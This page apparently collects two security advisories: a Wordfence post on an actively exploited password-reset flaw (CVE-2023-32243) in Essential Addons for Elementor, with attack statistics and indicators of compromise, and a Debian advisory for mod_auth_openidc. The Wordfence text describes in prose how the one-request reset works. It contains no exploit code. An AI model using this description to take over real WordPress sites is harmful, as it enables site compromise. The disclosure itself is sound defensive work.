    Attackers are already exploiting the critical Authentication Bypass Vulnerability in Essential Addons for Elementor.On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.Over the past few days we’ve seen millions of probing attempts for the plugin’s readme.txt file, which are likely to be attackers probing for the presence of the plugin to build a target site exploit list, along with over 6,900 blocked exploit attempts. Our attack data is limited due to the fact that the rule only triggers if the plugin is installed on a site with a vulnerable version, but a programmatic exploit was made public on Github on May 14th. This is the type of vulnerability that tends to see widespread attacks due to a combination of a large install base, ease of exploitation, and severity of impact, and we anticipate that exploit attempts will only ramp up from here.Wordfence Premium, Care, and Response customers received a firewall rule the same day the issue was disclosed on May 11, 2023. Wordfence free users will receive that same protection 30 days later on June 20, 2023. Considering how easily this vulnerability can be successfully exploited, we highly recommend all users of the plugin update ASAP to ensure their site is not compromised by this vulnerability.This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.READ THIS POST ON THE BLOGVulnerability DetailsDescription: Essential Addons for Elementor <= 5.7.1 – Unauthenticated Arbitrary Password Reset to Privilege Escalation Affected Plugin: Essential Addons for Elementor Plugin Slug: essential-addons-for-elementor-liteAffected Versions: <= 5.7.1CVE ID: CVE-2023-32243CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Rafie Muhammed Fully Patched Version: 5.7.2The vulnerability patched in Essential Addons for Elementor allowed for attackers to reset passwords for arbitrary accounts on any of the one million WordPress sites running the plugin. This was due to the fact that the reset_password function did not adequately validate a password reset request with a password reset key, so attackers could simply supply a valid username, obtain a valid nonce from the site’s homepage, input random data for the remaining fields, and reset the supplied users password to whatever they chose in one simple request.WordPress doesn’t consider usernames to be sensitive information which means attackers can easily enumerate a site looking for valid usernames. Additionally, site owners often forget to change the default username making it possible for attackers to use common default usernames such as ‘admin.’ This makes it much easier for attackers to uncover valid accounts that they can compromise in order to elevate their privileges on the site. Once the attacker is logged in as an administrator, they have free rein to perform actions like installing plugins and backdoors to further infect the site, server, and any unsuspecting visitors.A Look at the Attack DataPlugin Discovery ProbingThe first interesting trend we noticed is that immediately following the disclosure of the vulnerability on May 11, 2023 readme.txt probing attempts for Essential Addons for Elementor immediately spiked and remained relatively higher than normal over the course of a few days. While there are services that probe installation data for legitimate purposes, we believe this data indicates that attackers began looking for vulnerable sites as soon as the vulnerability was disclosed. Over 5,000,000 readme.txt probs were made just the day after disclosure.readmeprob Top Offending IP Addresses Engaging in Discoveryreadmeprobip Top Offending IP Addresses And Total Number of Exploits BlockedIn the past 5 days, we have blocked over 6,900 attacks with the top attacking IP being 78.128.60.112. We have also detected and blocked a few hundred exploit attempts utilizing the exploit that was released two days ago. Again, our data is limited due to the nature of the WAF rule, however, it’s worth noting that all of the 6,900 requests we blocked would have likely led to site compromises if they did not have Wordfence Premium installed.exploitattempts Indicators of CompromiseOne obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability, and the site is running Essential Addons for Elementor version 5.7.1 or older. We also recommend checking for newly added malicious administrators, as these may have been added to maintain persistence.We have begun tracking infections on sites running a vulnerable version of the plugin, and though no clear pattern has yet emerged, sites running outdated versions of the plugin were already at significantly higher risk of infection than our average user.User Agents- The public exploit uses the following User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Look for requests in a site’s access log with the following originating IP Addresses:- 78.128.60.112- 23.224.195.51- 212.113.119.6- 193.233.232.243- 91.193.43.151- 51.77.200.137- 2a0e:d602:1:4c8::2- 103.187.5.198- 2a0e:d602:1:bae::2- 103.149.137.18ConclusionIn today’s article, we covered a Critical-severity vulnerability in Essential Addons for Elementor that allows attackers to easily take over websites by resetting the password of any user, including administrators. We have begun tracking attack data for this vulnerability and expect attacks to ramp up as the vulnerability is trivial to exploit, has a wide install base, and is highly impactful, making it incredibly attractive to attackers.Wordfence Premium, Care, and Response customers received protection against this vulnerability via a firewall rule on May 11, 2023, and Wordfence free users will receive the same protection 30 days later on June 20, 2023.Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 5.7.2 in order to maintain normal functionality, as this vulnerability is severe. If you have friends or colleagues running Essential Addons for Elementor, be sure to forward this advisory to them, as hundreds of thousands of sites still remain unprotected and unpatched.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. I’d like to say a special thank you to my colleague Ramuel Gall, Senior Security Researcher at Wordfence, for his assistance on this research and post.

WordPress Elementor Lite 5.7.1 Arbitrary Password Reset

Debian Linux Security Advisory 5405-1 - It was discovered that missing input sanitizing in the implementation of the OIDCStripCookie option in mod_auth_openidc could result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5405-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
May 18, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libapache2-mod-auth-openidc  
CVE ID         : CVE-2023-28625  
Debian Bug     : 1033916

It was discovered that missing input sanitising in the implementation  
of the OIDCStripCookie option in mod_auth_openidc could result in  
denial of service.

For the stable distribution (bullseye), this problem has been fixed in  
version 2.4.9.4-0+deb11u3.

We recommend that you upgrade your libapache2-mod-auth-openidc packages.

For the detailed security status of libapache2-mod-auth-openidc please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libapache2-mod-auth-openidc

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRmI/EACgkQEMKTtsN8  
TjbcwQ//X8b4XxzVskGaPquONqmUjMN8ca0u/bEff7oguG9M+5MNDCWKY+8f6kyS  
R7xd7zn2hXJJh5/+fiHcd+tuvE5stMBjATm0Y2f77GypHjoNwTa+G6JYKRhUGqul  
b9CjiosjxtlmaSI2zsrnlVssckqqw56VdgCr7zZf8aw2yyxeZ0zeD81SujaScTm0  
oqJ8Y5TQqrCzNldkmlSykZxjqQ6PPrpR/DrOXh5UB0i9YJqZWnz4ALib2rl4zJXt  
VQhPkSbOEn1gUnN1ypj5IjP74EaLx3ezrMqzMPMmKlNKOerDcHLy04C1dpwg8lET  
RFeT2JrFk9VYTriOjfbzTny55WubRZ3qQKCdoZWS8MwGcZfddt07iJ5746WOwmwp  
mlJ/9WTVR4uX/Z2IldVdfCiSEEOAYk5hQSAV1BGnTQVAlfPQlN50YyDQAxH7D4hs  
R5jBAbblsKyru9EnPrRIqNnYmoFbPoY1c+19LKGulCxtUyawH6gglkB3vq8+e9xv  
yGSjyrTzSCxmkU+RpEExtU3qQiS2NV/MCwCMR5kVYRdGA5SVScSnOJzCR3SoCr8Q  
WmhcCwWLqQCikuxtfmdSsYIHbIIG9XP1Lgwc4quGKD/f/JyySmW+odbIMdTjd61R  
DmFRpb+kRRL54tuexl+xbMSgPhIKMljdetCuoBUZacgJVDpW1Jw=JOw9  
-----END PGP SIGNATURE-----

Source

Packet Storm